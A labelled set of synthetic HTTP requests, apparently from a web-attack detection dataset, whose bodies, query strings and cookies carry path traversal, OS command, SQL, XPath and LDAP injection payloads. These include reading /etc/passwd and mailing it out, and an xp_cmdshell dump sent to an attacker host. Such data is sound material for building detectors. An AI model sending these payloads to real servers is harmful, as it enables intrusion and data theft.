Accept-Charset: x-mac-arabic;q=0.4, x-mac-turkish;q=0.6, cp-932;q=0.9, iso-8859-7;q=0.3, x-mac-icelandic;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: g-sscnee
Cache-Control: max-age=3646
Client-ip: 214.154.43.120
Cookie: mpb0=stboot.ini ;aed5nSmTaOms=6089;noTepiadztor=88;asveen2iaq38hoe=childo:updatel;2G5orZselectDKU=22811365;mweceeu9at19OE=02614635
Cookie2: $Version="47"
Date: Tue, 17 Jan 06 06:03:53 UTC
ETag: W/"ZQSWlV9na2_UGVxwVs"
Expect: 100-continue
From: ma7N@qaot.net
If-Modified-Since: Sun, 17 Feb 08 03:00:24 UTC
If-Unmodified-Since: Wed, 28 Nov 07 13:09:17 GMT
If-Match: "suQwAJicb-rcOSKZMrZ"
If-None-Match: "MYcPA9YU0h1iquSRf"
If-Range: Mon, 10 Jan 05 24:27:15 UTC
Max-Forwards: 174
MIME-Version: 0.1
Pragma: yeb='twjx2ffi'
Proxy-Authorization: Basic Z25peXFzaDpld3NkcnA=
Authorization: Digest opaque="uhen"
Range: -96373
Referer: http://x4av.uk/lezueg/sr8s/sptc/a1emb/iocee.txt
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.1 (Windows; U; Win98 0.2; ut-ir; rv:7.4.0) Gecko/55015032
UA-CPU: Sparc
UA-Disp: 011,9897,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7262x7113
Via: FTP/0.0 196.51.159.170, t5ode/5.4 www.aIeotEm.jpeg
Transfer-Encoding: gzip
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38402
Start - Id: 45735
class: PathTransversal
GET /rErfnol/uvnEo18tcodsv.asp?rd0ol=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Tt4KZXH@il=sheo&m7tlhhat3otiGk=805872&nwi=linkva%24xe+%27 HTTP/1.0
Host: 1.111.67.165
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=89998
Client-ip: 195.187.195.167
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Wed, 27 Feb 08 22:51:18 GMT
ETag: W/"ZuZLKP3v5YD1lYXEqcG"
Expect: twlia9=reoe
From: id9Eem@Ce2rja.fr
If-Modified-Since: Tue, 29 Sep 09 11:46:58 GMT
If-Unmodified-Since: Wed, 15 Oct 08 02:24:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 4.6
Pragma: d='Yfiftr4'
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: /ien0iltk/cnnbtn/iS0mn.wav
TE: chunked;q=0.2,trailers,trailers
Trailer: Via
User-Agent: AOfnwzs4th/7.5.2.2.6
UA-CPU: Sparc
UA-Disp: 3522,615,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: 8.2 234.125.69.23, 0.5 www.cne4s4.html
Transfer-Encoding: gzip
Upgrade: gise/4.4, ekas/4.1, Clis/0.2
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45735
Start - Id: 43101
class: OsCommanding
GET /9thNDU.jsp?isdoadpfrUthaol=rTbl1lmnRvGQ&nIteirileor=93428233&O0tdgqeb=iaihttpo&synwrrSinwetus=7437023&cfsonsekmaoqfbf=91&rnN9oiG48e=hhtsid&sttSh5d=ksitctnfN&bIioyalAt4j=oops%3Bcat++%2Fetc%2Fpasswd+%7Cmail+++your%40an9hm.com&KoPWFl.5wWj=493&kh=+Roohs HTTP/1.1
Host: www.ieiVG.st
Connection: keep-alive
Accept: video/*;q=0.8, text/*;q=0.6, text/plain
Accept-Charset: *;q=0.5
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.22.241.142
Cookie: oey3efl9rrsN=201
Cookie2: $Version="67"
Date: Sun, 20 Sep 09 24:51:04 UTC
ETag: W/"XZEbfacun@a_9@4"
From: qEgfHnmn@tsw5sAas.biz
If-Modified-Since: Wed, 06 Feb 08 22:53:59 UTC
If-Unmodified-Since: Tue, 03 Feb 04 18:28:18 GMT
If-Match: "03M9dD5y5JmloZcTZw"
If-None-Match: *
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 66
MIME-Version: 6.4
Pragma: utogitrL=s
Proxy-Authorization: NTLM OXpyZ29vZW1ubnlmbzhlZXV1Y2tyaHN0ZGF4ODFuYmFhZHRr
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /rnepoe0e.pl
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/6.4 (X11; U; Unix 6.0; 3t-es; rv:5.2.2) Gecko/12289745
UA-Disp: 418,932,32
UA-OS: Solaris
UA-Pixels: 2923x7442
Via: 4.4 113.146.55.131, FTP/8.5 www.DytMl98c.shtml
Transfer-Encoding: deflate
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Serial-Number: 306986025864028
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43101
Start - Id: 44701
class: PathTransversal
POST /oeZooXQ1EUhGZqXz1SS/eQskcSEgUvPb3R/atjmnihlihztEyo/npYSdtCX0H2kMDj/SCisowriwo8hKsunhe/ghtde/mTcC/ZtlONR.jpeg? HTTP/1.0
Content-Length: 134
Content-Language: q0e,e,6ipsL
Content-Encoding: identity
Content-Location: /Woei/deaiili/tshecwa/BSamow/se6qlpr.tiff
Content-MD5: YXNlSXRJd2dyZW90czZkUg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 06:56:56 GMT
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: www.cmeilnr.fr
Connection: close
Accept: application/*, application/*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: gdciop-0aki;q=0.9, s-pn4anyt;q=0.5, nfhn-sut5, edhdf-uh
Cache-Control: no-transform
Client-ip: 159.172.8.1
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Wed, 22 Apr 09 17:18:58 UTC
ETag: W/"LMhgcAcKZubNHyMAZq"
Expect: lnumHot=vabdgrue;cMiuP
From: aiino4r@HoCiOqeo.be
If-Modified-Since: Mon, 12 Jan 09 01:26:50 CET
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 487
MIME-Version: 8.4
Pragma: htmjegse='Edo0'
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Digest opaque="heuedq"
Range: 2168-,8-1607,73-
Referer: http://nyhdt9s.st/rgeEwkh9/caeaLbi/eine1z/e3so/lFpjyse.tiff
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: a7vdd (eB8d3I.G; egBeoqoN)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2309x0531
Via: 8.9 193.116.9.112
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

i3hIbtegl=0632&hsnerstDebeeCu=./../../../../../&AG3ml8A=onuTL8@HyZ&n5nisFnieodied=nehomeeelikessm&b9ui2eSsRtNAirt=485028

End - Id: 44701
Start - Id: 48540
class: XPathInjection
POST /to0v/9_AM6K-LxmlGa/cR6bw5Qtw/eRrkcD1A_Dd/a@77/KX_VHhtaccesIOcT3/tpoQ4N5qx/taeamcsa0sgi/nTjzh3FNaD_68PHdk0/tr/ieMtb8HSgr8l6w1O.Y/iJ3GLC7tHlxcyJa.mspx? HTTP/1.1
Content-Length: 194
Content-Language: on3Zama
Content-Encoding: compress
Content-Location: /jpran/pan1od.swf
Content-MD5: dHJubWNuaG9nc3dNYWY0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Nov 06 18:09:05 GMT
Last-Modified: Sat, 18 Jul 09 01:47:21 UTC
Host: 66.208.11.145
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: Ns9coxa-d4e;q=0.4
Cache-Control: no-transform
Client-ip: 61.82.105.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="80"
Date: Fri, 24 Feb 06 16:21:27 CET
ETag: "GcXnmUBFxWJV.V3_q"
Expect: 100-continue
From: 5lotN@aerqwne.st
If-Modified-Since: Thu, 12 May 05 09:13:39 CET
If-Unmodified-Since: Wed, 04 Apr 07 19:11:19 CET
If-Match: *
If-None-Match: "UP1Ir5HsSq7x3YVl@X"
If-Range: "fx6n5Sfvf-ttZzmo"
Max-Forwards: 337
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: NTLM cmVybnJuc3RkaWE2UGhzZ2llU3VoaG9sZWVhNmF1dWF0amc3b29uUmhlbmV0dTc=
Range: 4-
Referer: http://www.o0aigy.be/whResm/iornf7s3.ace
TE: deflate;q=0.8,trailers,deflate;q=0.6
Trailer: Expect
User-Agent: agGDdOZ http://www.bslco.gov
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 429x1759
Via: 9.3 189.251.16.174, 7.0 52.194.128.111:54646, FTP/1.8 www.0onii.html
Transfer-Encoding: emtrea; hmpeoynn=itlnIen
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6syjog9le=g-rcpe<mocha 3mHg&Pcz69KS5Yk=(i  <  count(ach/child::text())   and  j  < count(fe/child::comment()) and     k < count(rd7d/child::*) )

End - Id: 48540
Start - Id: 35520
class: XPathInjection
PUT /jopen202/n4nsiadprersaehi/jN8XqeXzrASFimgp2Ccx/lvKN5O_ODRX_7t-I/PCfdropDnetcatYfKoy0WR/reWS5x7l1/wK@/rwynplpcenkh/Elyem.php? HTTP/1.0
Content-Length: 176
Content-Language: 1itere,mnTR,sppmns7
Content-Encoding: deflate
Content-Location: http://www.htbemq.st/aWia2/yiwttrlS/lgaza.zip
Content-MD5: dDRuYXJpbnRhb1ZzY3RvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 20:40:13 GMT
Last-Modified: Sat, 27 Aug 05 17:48:46 CET
Host: www.pr3olos7f.ch
Connection: close
Accept: */*;q=0.4
Accept-Charset: koi8;q=0.5, x-mac-japanese;q=0.2, gb2312
Accept-Encoding: 
Accept-Language: o-l, 9nc9nu4-bcfwne;q=0.7
Cache-Control: min-fresh=40
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="1"
Date: Wed, 22 Aug 07 20:41:49 CET
ETag: W/"wYIs_0Uq6o6HosczL"
Expect: 100-continue
From: iSTRreh@vcr3m.net
If-Modified-Since: Tue, 10 Jul 07 04:02:15 CET
If-Unmodified-Since: Sat, 12 May 07 16:49:45 CET
If-Match: "65vsifuT2uKvnZ-iUT"
If-None-Match: "piErswzBRTVTZp7NuS"
If-Range: Sat, 04 Feb 06 22:38:31 GMT
Max-Forwards: 444
Pragma: no-cache
Authorization: NTLM b2l0Y2FvQ2l0MnJzdm5lb2VpZWhFZW90dHF0NmFxaWV0eWVOZWQ=
Referer: http://www.dxObsG2.ch/lltpA/rkda/teeEeeua/dhinisat.avi
Trailer: Pragma
User-Agent: pb4gjTp http://www.6eui.gov
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity

w2xieeh3g=cenhp&g5=alr&nohodeb=rlhixr']   |   P   |    //user[  name/text()   =    'Ceno&omo=nF1enNsudl&5Ehirhmxke2ou2e=nQAvl7NyO&eahaSBodrEron=rtoyIiiB

End - Id: 35520
Start - Id: 49031
class: XPathInjection
GET /sCcV/uechoscript_fB0/oODEKcAGrcb2_P8ni/mhC7r1u/aahiictu0xrWu/TVbcJIBrQt/iaAaneepseDnmwai7sYr/7lnErm/hyGF-yn2R/r@98q/ufiframeOXusrhtaccesqjuM/6Z4jN27h.tiff?aF_0J=otYE%27++or+++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28i++%2B+j+%2B+++k++++%2Bl+%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++%27ansh3s%27+%3D+%27++nni6h%27+or HTTP/1.0
Host: www.vae3oefat.it
Connection: nadn
Accept: text/html
Accept-Charset: iso-10646-ucs-2, euc-kr;q=0.9
Accept-Encoding: identity, compress, identity, gzip;q=0.5
Accept-Language: kn8hn-heIsifg;q=0.2, nyhlltsT-Swerrz4;q=0.3, n-w4a
Cache-Control: min-fresh=024
Client-ip: 172.221.103.89
Cookie: 8rkqt2R=sY6cDHCpC;imgJVI=heo;hrs=6zkXHi1;ndheo=h;bevalc;tiw;EmsAaealr=ad&o
Cookie2: $Version="88"
Date: Thu, 27 Nov 08 09:40:18 UTC
ETag: "Kwk_awq.zXe8gOM"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sat, 09 Aug 08 17:50:32 UTC
If-Unmodified-Since: Tue, 06 Jul 04 10:21:15 UTC
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: "g_VEED3rl1HRMsDT"
If-Range: *
Max-Forwards: 6940
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Basic Z2ljb2NzOm5mZWVhbg==
Range: -31
Referer: http://www.lNetde.net/2fsro/eutxt/aipn/TEiueao.ace
TE: deflate;q=0.7,gzip;q=0.9
Trailer: Via
User-Agent: that/3.6.6.6.6
UA-CPU: 68000
UA-Disp: 913,4010,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: rphl/5.9 246.138.1.26
Transfer-Encoding: compress
Upgrade: sfltc/9.5, Llja/5.6
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49031
Start - Id: 38005
class: LdapInjection
GET /Znct6cL/nArrT.rQ/ansfima3ndsanr/tsxs8erA6ftcorlqO.htm?yMoesstd9a9nSc=i&er=6917%29%28%26%28objectClass%3Dqwei%29%28%7C%28sn%3D+bw%29%28cn%3Doov+++++J*%29%29&fqBx@v=jtaE9Huenrlce&hs=bsimgoixhfrom%7Coxmlstnyl%27&seofcihx=eo&ykhiOadmin=1la&noqteoeg0=rnesaim+sibe5Adsswc&elrAanNue=31678685&nanatmgurttooNy=75 HTTP/1.1
Host: www.qtanveedo.ch
Connection: keep-alive
Accept: image/jpeg, text/plain, audio/*;q=0.5
Accept-Charset: iso-8859-7, iso-8859-7, us-ascii, hz-gb-2312, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 41.179.118.200
Cookie: ltnytfearluli=wmgDOQMni;0aG=rkssr;Qr7Xaenumone=1607;rnN=i|iH)cis
Cookie2: $Version="946"
Date: Wed, 02 Nov 05 19:59:02 GMT
ETag: "hV.JIX8B8-yhf_cSKq"
Expect: 100-continue
From: Noqnil@peZa0.st
If-Modified-Since: Thu, 27 Aug 09 22:15:48 CET
If-Unmodified-Since: Fri, 15 Dec 06 09:38:44 UTC
If-Match: *
If-None-Match: "yuFYIrDhYCpRPiOVR"
If-Range: "lBALiuBRewy@DTjjqF"
Max-Forwards: 6010
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Digest response="02dffa1Fb829C3fbED3BBcFED96d7571"
Range: 17672-41
Referer: /ltnete/beefrad.conf
TE: trailers
Trailer: Connection
User-Agent: eaq4JVtn http://www.atf0afa.com
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: sotboi/1.1 www.nRba8ie4.png, 1.8 www.ouxe.gif, FTP/5.6 www.tLiue.shtml
Transfer-Encoding: deflate
Upgrade: jrr/4.9, egaar/4.0, 1Zoc/3.1, zjwo/5.8, 95o/6.0
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38005
Start - Id: 41359
class: SqlInjection
PUT /uut2deai/otabA5eeee/9asni/eou/o5BpYd_DdSZ.d8z@/nFFxxgperlJK9/h0ITw2Gj.exe? HTTP/1.0
Content-Length: 158
Content-Language: ocirepi7,qsbl
Content-Encoding: deflate
Content-Location: /51ns/ditevnf/Tvrh7/cnh1mbr.nsf
Content-MD5: ZWlOMWpuZTN3bW16cmVscg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 04:27:48 CET
Last-Modified: Thu, 22 Jan 04 09:44:28 UTC
Host: 184.98.57.133
Connection: eeiTtem
Accept: application/postscript, text/html, application/rtf
Accept-Charset: cp-950, x-mac-arabic;q=0.1
Accept-Encoding: *
Accept-Language: o-anSth, pnsds-m;q=0.5, hsc-erwRke, 1ee-aoTdSrgy, ceroows-a
Cache-Control: no-transform
Client-ip: 200.4.215.226
Cookie: fo=ghhhadbhnnozto
Cookie2: $Version="6"
Date: Sun, 05 Mar 06 04:22:48 CET
ETag: W/"FCG-uyh4rFkGO.a"
Expect: seytm
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Sat, 15 Jan 05 08:29:36 CET
If-Match: "eNemoRxU8IviMzTJ."
Max-Forwards: 8818
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: abryl sncnwry=mz4brhd
Authorization: Basic YTJmcmhyc2I6RXMybjdlbnM=
Referer: /esgpqAo/ehaoew/oSaNsn/cS6i.jsp
TE: trailers
User-Agent: Mozilla/7.2 (compatible; MSIE 2.9; Solaris; hxstsiht)
UA-Disp: 557,1073,8
Via: 7.0 www.seourc.css
Transfer-Encoding: gzip
Upgrade: nhetgd/3.9
Warning: 958 32.181.9.136:0 "eebnciwnoLmnj" 
X-Serial-Number: 309660

ashn5atbueyal=;     EXEC(    'INS'+'ERT     INTO   users  values(2820,'axtN','r6Eais505'))&_rQ5aO=adminhtm35awt&sox8iRtvzij= fyA

End - Id: 41359
Start - Id: 42568
class: SqlInjection
GET /egkdceairg5odos4i3.gif?sios8uef=%5Cirrubr&Ht4oewebhSwde=aut%3FostBaoohavingnb&bG6OautoexecyX9varDS=chairs%27+++++UNION+++SELECT+++++ue++++FROM+dba_users+++++WHERE++++name++++like++%27%2525&3drifwds=947658&_e67dfZd1_Q=28723&ls0rs=mN HTTP/1.1
Host: 3.1.47.248
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1251;q=0.4
Accept-Encoding: gzip;q=0.7, gzip;q=0.2, compress, deflate;q=0.5
Accept-Language: zelhre-m;q=0.8, mafni-craehetg, ireegbeo-rniu
Cache-Control: only-if-cached
Client-ip: 58.68.40.65
Cookie: D9=291596721;3n.Gpgx6aK=sjc
Cookie2: $Version="57"
Date: Sun, 29 Jun 08 16:30:30 CET
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Thu, 10 Jan 08 06:44:02 GMT
If-Unmodified-Since: Sat, 29 Aug 09 18:02:08 GMT
If-Match: "ko-up2h_R5he46_b"
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 6
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXRlYWFyc1RlaHJzNlRuMGVlc293dGV1c2tlb3Boc2J0c3M5OWVjdGhod3ph
Authorization: feet elTus=lwzomle
Range: -05,8037-,228664-
Referer: http://ooutei.com/etrtg/hflaL7/1rmdan2/e8i9s.pl
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: eosoi/0.9.7.8
UA-CPU: MIPS
UA-Disp: 4287,1140,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 161x8196
Via: FTP/1.6 119.136.0.101
Transfer-Encoding: gzip
Upgrade: idlsll/7.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42568
Start - Id: 41152
class: SqlInjection
GET /eyshwL0_OFi6dI.mS7nq/dropcPPRTgroup byn0WM/kiactom/l_z3_XfSJ1.gif?0dmgtHgdHt=exec+++xp_cmdshell++%27bcp++%22select+++++*++from++++odakNye3om%22+++queryout+++pwdump.exe++-c++-Craw++-Shackersip++-Usa++-Ph8ck3r%27&QOMHPSY.Oed=sbm6l1+6t&-vJXKR=44715 HTTP/1.1
Host: www.4raciisz7.fr
Connection: keep-alive
Accept: audio/*;q=0.8, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: twe-dt
Cache-Control: max-stale
Cookie: ieghswrp=mLD8;nbTwotss=qlo3mantoNpt;o3rsPugntevog=010
Cookie2: $Version="1"
Date: Mon, 16 Nov 09 20:36:35 GMT
ETag: "kySf-tR9OR..Mwo"
Expect: jnem
From: etcosIO@avtere.net
If-Modified-Since: Mon, 07 Aug 06 05:54:20 CET
If-Unmodified-Since: Fri, 23 Apr 04 07:04:21 UTC
If-Match: *
If-None-Match: "Kv6gMT@eA1FO14etD0t"
If-Range: "vT0rCWjKTpjr2T7kNG"
Max-Forwards: 1034
Range: -024
Referer: /Hni3r.gz
TE: trailers,deflate;q=0.6
User-Agent: mAhTJT0V8N http://www.7Sol.ch
UA-CPU: StrongARM
UA-OS: Windows 98
Via: alu/3.6 www.a2oeesn.tiff, 6.1 www.etiIt.jpg, 8.6 56.53.254.221
Warning: 317 5.218.126.84:2 "bdhuhPeStawrDs" 
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41152
Start - Id: 38253
class: LdapInjection
GET /echoymlsnhttpsbyPt.php3?rcepteieltel=ri9-oCc_7Mx.&2processing-instructionWCFekl=lt%29%28%26%28objectClass%3D+hpe*%29&lMX2ZconnectEnA-E=2&dnrnisd=oynltOawsetlajbmnu&a1=dim&6gt8rkrDI=geoegYeortiidl&tDtiDitpEov=ed59 HTTP/1.0
Host: www.ce9shiynon.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 113.81.106.78
Cookie: Vg-mEnS.Rftp=eyo$itacQftpug;eSllHtibAmea=lAMm3Iv3fgC;bmoenes6Ayst2=|6s~/
Cookie2: $Version="7"
Date: Sat, 21 Nov 09 17:56:06 GMT
ETag: "HmmK-Pe-jjfxx-a"
Expect: 100-continue
From: Eorust@uthn0.it
If-Modified-Since: Thu, 30 Sep 04 23:14:00 UTC
If-Unmodified-Since: Mon, 04 Feb 08 01:07:30 UTC
If-Match: "LZFfgPJvCKS-RmsQGRlu"
If-None-Match: "BM5Iw0_2fJIZz3jEOH"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: NTLM cmFubm5kUHViczJsYU9ORUxjYXR4YWduaWFPTHpwdDJuaG5hZHlydGtzc2llOXNS
Range: -23
Referer: /otlt/hs0ej2/fbniam/atsrse.conf
TE: chunked,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 8.4; rT-an; rv:4.4.6) Gecko/37124945
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: 9.2 www.lo6asdq.png
Transfer-Encoding: compress
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38253
Start - Id: 41003
class: SqlInjection
POST /eWeeg9aoesefmca2lteh/EFF0CZI1ZA1dF/tMNXWTQpZRF80p18.4.php4? HTTP/1.1
Content-Length: 383
Content-Language: onnt,kOdcoNe
Content-Encoding: compress
Content-Location: http://top6jr2u.org/hCea1.jsp
Content-MD5: aGNlbGV0ZWl3c3dhaWRnaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Sep 04 17:54:36 GMT
Last-Modified: Wed, 21 Sep 05 12:11:13 CET
Host: 143.30.27.47:969
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, euc-cn, cp-936;q=0.6, x-mac-chinesesimp, iso-2022-kr;q=0.5
Accept-Encoding: gzip, gzip, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 40.88.12.243
Cookie: seneatigg=3974451;le6iirpsree=ykW-RZPY;ns= t;eieIttpi=dselect;k5=41459;HLtPQPTLallD=14
Cookie2: $Version="889"
Date: Wed, 14 Sep 05 13:05:51 UTC
ETag: W/"yB2VYqpUnbgTE.vlG9"
Expect: 100-continue
From: syMege@l8wshrfu.st
If-Modified-Since: Sun, 15 Jul 07 24:17:00 UTC
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 900
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: /ie2Sne1e/4y8sohr4/dlz65tBb.msf
TE: chunked;q=0.5,trailers
Trailer: Expect
User-Agent: inj1hesfeM4sLfnteuln
UA-Pixels: 892x2342
Via: 5.5 77.123.47.59, HTTP/8.5 www.e3utmH.jpeg:74, 3.8 www.soszcrSe.jpg
Transfer-Encoding: gzip
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 481 www.urpe.html "staaipsty" "Sat, 08 Jan 05 13:43:34 GMT"
X-Forwarded-For: 250.186.208.209
X-Serial-Number: 0694203566390094
----: ------------

rwakmg=9116206053&q4boot.iniH@QXAgDF=22513&lec=7561&eie=8016189&Lrwreeaha1ir9mc=&tsmraeetcbnp&ec=2aiYO6yNXyJ&l6saheTn=etetAS)etcodrop2&giiFsb=exec     xp_cmdshell  'bcp "select     *  from     vFbsSgKew"     queryout   pwdump.exe   -c -Craw    -Shackersip    -Usa    -Ph8ck3r'&thheyFdtItedem= hi4&hnnUOeiler==v&oeHwgetRKpassthrux3FpR=ecq1ez&Vw286--AQSV=zetwodArsqadb9Np

End - Id: 41003
Start - Id: 43642
class: OsCommanding
PUT /1p/i3ot5shloen/fvQFLq08D/tdv/etxrJetse/hczxX75d8VQx9N2rno.tiff? HTTP/1.1
Content-Length: 65
Content-Language: r
Content-Encoding: deflate
Content-Location: /etjitO/toAkHp/0vat3ft.php3
Content-MD5: ZXNmVXJjdDRUbnFhdGRlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 May 08 08:02:55 GMT
Last-Modified: Wed, 21 Jun 06 06:28:02 GMT
Host: www.itCtrnnSl4.net:8694
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: sao-ie4et, Im-uotkep;q=0.2, Hco-aR1i8ao;q=0.6, oqhtdmt-s0aw;q=0.3
Cache-Control: min-fresh=4
Client-ip: 95.136.14.248
Cookie: tnnuei=ibinatscopy ;oevlkii=232;la5Itafti6o3Y=ls  -las    /home/ |;r28e5phzja=dcuoB-x.EzYW
Cookie2: $Version="636"
Date: Sat, 15 Oct 05 24:01:37 GMT
ETag: W/"SoaTPs1nfTwM67J"
Expect: nsiiEes
From: hseet@mdxc.uk
If-Modified-Since: Tue, 20 Apr 10 20:25:31 UTC
If-Unmodified-Since: Mon, 15 Sep 08 05:30:34 GMT
If-Match: "sZC9zGwsZdc7n2hTGE8"
If-None-Match: *
If-Range: *
Max-Forwards: 97
MIME-Version: 0.3
Pragma: cEhnso='tuaga3'
Authorization: Digest realm
Range: -38659,99581-,-57
Referer: /ppit4eNq/osat.png
TE: chunked,trailers,gzip
